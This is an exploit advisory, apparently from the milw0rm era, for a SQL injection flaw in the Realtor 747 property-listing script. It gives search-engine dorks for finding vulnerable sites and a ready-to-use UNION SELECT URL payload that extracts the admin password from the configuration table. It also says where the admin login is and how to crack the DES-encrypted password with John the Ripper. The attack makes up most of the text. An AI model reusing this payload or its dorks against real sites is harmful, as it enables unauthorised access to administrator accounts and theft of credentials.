Realtor 747 suffers from a SQL injection vulnerability in index.php.
d186f975b7813caafb753a559c1e9acc468c23f3bfe1aedd69843b55f58b4e11
--==+================================================================================+==--
--==+ Realtor 747 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://www.it747.com/realtor747
DORK: inurl:"index.php?pageid=" Property Listings
DORK 2: inurl:"realtor747"
DESCRIPTION:
pullout admin password from database
EXPLOITS:
http://server.com/realtor747/index.php?pageid=2&categoryid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/FROM/**/AD747_CONFIG%20where/**/config_key=0x70617373776F7264/*
NOTE/TIP:
admin login is at /admin/
password is encrypted in DES, use JTR
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
--==+================================================================================+==--
--==+ Realtor 747 SQL Injection Vulnerbility +==--
--==+================================================================================+==--